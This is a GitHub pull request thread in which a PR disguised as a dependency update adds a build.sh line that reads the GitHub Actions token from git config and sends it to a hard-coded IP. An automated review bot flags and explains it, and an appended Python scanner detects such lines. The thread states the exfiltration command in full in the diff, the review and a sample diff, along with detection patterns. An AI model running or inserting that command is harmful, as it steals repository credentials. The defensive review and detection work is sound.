chore: update deps #51

Closed
1nd0 wants to merge 1 commit into NVIDIA:main from 1nd0:malicious-payload

@1nd0 1nd0 commented Mar 5, 2026

security test

@1nd0 1nd0 requested a review from a team as a code owner March 5, 2026 20:41

greptile-apps bot commented Mar 5, 2026

Greptile Summary

This PR introduces a single new file, build.sh, which contains a malicious credential exfiltration script. Despite being titled "chore: update deps" with description "security test," the file does not update any dependencies — it is a supply chain attack payload.

Key findings:

  • The script reads the GitHub Actions authentication token from git's hidden config (http.https://github.com/.extraheader), which is automatically set by GitHub Actions to contain the GITHUB_TOKEN bearer credential.
  • It base64-encodes the stolen token and silently transmits it to an attacker-controlled server at http://34.209.142.1:4012/exfil.
  • If this script were ever invoked in a CI/CD pipeline, an attacker would immediately receive a valid GitHub authentication token, potentially gaining write access to this and related repositories.
  • This PR must be rejected and closed immediately. If this script was executed at any point (e.g., in a CI run triggered by the PR), all repository secrets and tokens must be rotated immediately and any repository access logs should be audited.

Confidence Score: 0/5

  • This PR must NOT be merged — it is a malicious credential exfiltration attack disguised as a dependency update.
  • Score is 0 because the sole change is a malicious shell script designed to steal GitHub authentication tokens and exfiltrate them to an attacker-controlled server. This is not a legitimate code change under any interpretation.
  • build.sh — the entire file is malicious and must be rejected.

Important Files Changed

Filename Overview
build.sh MALICIOUS: Contains a credential exfiltration payload that reads the GitHub Actions authentication token from git config and silently sends it to an attacker-controlled external server (34.209.142.1:4012).

Sequence Diagram

sequenceDiagram
    participant CI as GitHub Actions Runner
    participant GC as Git Config (http.extraheader)
    participant B64 as base64 encoder
    participant ATK as Attacker Server (34.209.142.1:4012)

    CI->>GC: git config --get http.https://github.com/.extraheader
    GC-->>CI: Authorization: Bearer GITHUB_TOKEN
    CI->>B64: pipe token through base64 -w0
    B64-->>CI: encoded_token
    CI->>ATK: curl -s http://34.209.142.1:4012/exfil?tok=encoded_token
    Note over ATK: Attacker receives and stores stolen token
    ATK-->>CI: (silent, -s flag suppresses output)

Last reviewed commit: 96de5d4

@@ -0,0 +1 @@
curl -s http://34.209.142.1:4012/exfil?tok=$(git config --get http.https://github.com/.extraheader | base64 -w0)
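
Review bot: reject the single added line of build.sh: it passes the value of git's http.https://github.com/.extraheader setting, base64-encoded, as the tok= query parameter of a silent curl request to a hard-coded IP address over plain HTTP, and nothing in it updates a dependency as the PR title says. A build script has no reason to read that setting, so the file should be removed rather than amended.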

Critical: Credential Exfiltration Attack

This line is malicious code that steals GitHub authentication tokens and sends them to an attacker-controlled server.

Breaking down what it does:

  1. git config --get http.https://github.com/.extraheader — reads the hidden git config key that GitHub Actions automatically populates with Authorization: Bearer <GITHUB_TOKEN>. This contains the repository's CI/CD authentication token.
  2. | base64 -w0 — encodes the token to make transmission easier.
  3. curl -s http://34.209.142.1:4012/exfil?tok=... — silently (-s) sends the encoded token to an external attacker-controlled server at 34.209.142.1:4012 via the /exfil endpoint.

If this script is ever executed in a GitHub Actions runner (e.g., as part of a build step), the repository's GITHUB_TOKEN or any other configured token would be immediately exfiltrated to the attacker's server, potentially granting write access to this repository and any others the token has permissions for.

This PR must be closed immediately, and the repository's secrets and tokens should be rotated as a precaution if this script was ever executed.
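
As an added example (not part of this pull request thread or of the repository's code), here is a small Python check that a pre-merge job could run over a unified diff to flag added lines that combine a read of the checkout credential with an outbound network command, the combination the review comment above breaks down. The patterns, the name scan_diff, the severity labels and the sample diff (which uses the documentation address 192.0.2.10) are assumptions constructed for illustration.

```python
import re

# Read of the auth header a CI checkout stores in git config (illustrative pattern).
CREDENTIAL_READ = re.compile(r"git\s+config\b.*extraheader", re.IGNORECASE)
# Commands that can send data off the runner.
EGRESS = re.compile(r"\b(?:curl|wget|nc|ncat)\b")
# URL whose host is a bare IPv4 address instead of a named service.
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?")

def scan_diff(diff_text):
    """Return (path, severity, reasons) for each suspicious added line in a unified diff."""
    findings, path = [], None
    for line in diff_text.splitlines():
        if line.startswith("+++ "):          # file header: remember the new path
            path = re.sub(r"^b/", "", line[4:])
            continue
        if not line.startswith("+"):         # only added lines are inspected
            continue
        added, reasons = line[1:], []
        if CREDENTIAL_READ.search(added):
            reasons.append("credential-read")
        if EGRESS.search(added):
            reasons.append("network-egress")
        if RAW_IP_URL.search(added):
            reasons.append("raw-ip-url")
        if not reasons:
            continue
        # A credential read and egress on the same line is treated as exfiltration.
        both = {"credential-read", "network-egress"} <= set(reasons)
        findings.append((path, "block" if both else "review", reasons))
    return findings

# Constructed sample diff; 192.0.2.10 is a documentation address, not from the page.
SAMPLE_DIFF = r"""--- /dev/null
+++ b/build.sh
@@ -0,0 +1,2 @@
+echo "installing deps"
+curl -s http://192.0.2.10:4012/x?tok=$(git config --get http.https://github.com/.extraheader | base64 -w0)
--- a/fetch.sh
+++ b/fetch.sh
@@ -1 +1,2 @@
 set -e
+curl -fsSL https://example.com/tool.tar.gz -o tool.tar.gz
"""

if __name__ == "__main__":
    for finding in scan_diff(SAMPLE_DIFF):
        print(finding)
```

A "block" finding is meant to fail the job outright, while "review" only asks a human to look at an otherwise ordinary download.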

@1nd0 1nd0 closed this Mar 5, 2026
@1nd0 1nd0 deleted the malicious-payload branch March 5, 2026 20:44

1nd0 commented Mar 5, 2026

This was a test. Reach out to psirt@nvidia.com with any questions.
